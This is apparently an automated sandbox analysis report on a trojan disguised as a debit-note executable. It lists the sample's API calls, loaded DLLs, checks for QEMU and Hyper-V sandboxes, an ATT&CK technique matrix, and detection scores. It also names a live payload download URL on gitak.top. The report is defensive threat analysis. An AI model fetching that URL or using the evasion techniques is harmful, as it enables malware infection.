    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownHTTPS traffic detected: 172.67.207.219:443 -> 192.168.11.20:49817 version: TLS 1.2
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405331
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_00404B6E0_2_00404B6E
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_0040659D0_2_0040659D
    Source: debit-note-19-08-dn-2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal80.troj.evad.winEXE@3/10@1/1
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404635
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeFile created: C:\Users\user\brugerlicensaftalerneJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsc47EA.tmpJump to behavior
    Source: debit-note-19-08-dn-2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: debit-note-19-08-dn-2024.exeReversingLabs: Detection: 50%
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeFile read: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeProcess created: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeProcess created: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"Jump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
    Source: debit-note-19-08-dn-2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

    Data Obfuscation

    barindex
    Source: Yara matchFile source: Process Memory Space: debit-note-19-08-dn-2024.exe PID: 5816, type: MEMORYSTR
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeAPI/Special instruction interceptor: Address: 86C1737
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeAPI/Special instruction interceptor: Address: 4EA1737
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11405587710.00000000032D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11404278301.000000000049E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE?\57
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11404278301.000000000049E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe TID: 6120Thread sleep count: 41 > 30Jump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe TID: 6120Thread sleep time: -410000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11160436121.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265722845.0000000005BF7000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11476497728.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11581843152.0000000005BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWkZ]
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11160436121.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265722845.0000000005BF7000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11476497728.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11581843152.0000000005BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11405587710.00000000032D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: xC:\Program Files\Qemu-ga\qemu-ga.exe
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8"
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11404278301.000000000049E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11404278301.000000000049E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe?\57
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeAPI call chain: ExitProcess graph end nodegraph_0-4744
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeAPI call chain: ExitProcess graph end nodegraph_0-4745
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeProcess created: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"Jump to behavior
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_00405F6A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F6A
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping31
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    11
    Virtualization/Sandbox Evasion
    LSASS Memory11
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Clipboard Data
    1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager3
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information
    NTDS13
    System Information Discovery
    Distributed Component Object ModelInput Capture13
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    debit-note-19-08-dn-2024.exe50%ReversingLabsWin32.Trojan.Generic
    debit-note-19-08-dn-2024.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://gitak.top/KGukxUu155.bin~5100%Avira URL Cloudmalware
    https://gitak.top/100%Avira URL Cloudmalware
    http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
    https://gitak.top/m100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bincy100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bin100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.binificateChainPolicy100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bin/u100%Avira URL Cloudmalware
    https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
    https://gitak.top/u100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.binR100%Avira URL Cloudmalware
    http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
    https://gitak.top/KGukxUu155.bink100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.binl100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bin/KGukxUu155.binID=100%Avira URL Cloudmalware
    https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
    https://gitak.top/KGukxUu155.bin/KGukxUu155.bin100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.binm100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bin/a100%Avira URL Cloudmalware
    https://gitak.top/a100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.binID=100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bin)100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bin#100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bine100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bin/m100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bin_100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bino(100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bin:100%Avira URL Cloudmalware
    http://www.quovadis.bm00%Avira URL Cloudsafe
    https://gitak.top/KGukxUu155.bina100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.binu100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bin?o100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bin0100%Avira URL Cloudmalware
    https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
    https://gitak.top/KGukxUu155.bin~53100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.binurT100%Avira URL Cloudmalware
    https://gitak.top/KGukxUu155.bin/100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    gitak.top
    172.67.207.219
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://gitak.top/KGukxUu155.binfalse
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://www.cloudflare.com/learning/access-management/phishing-attack/debit-note-19-08-dn-2024.exe, 00000002.00000003.12739260417.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15470510829.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12633967289.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11897223878.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15156086659.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.0000000007570000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14841282529.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15680230484.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000753780.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15365675266.0000000005C53000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://gitak.top/KGukxUu155.bin~5debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.bincydebit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/udebit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, 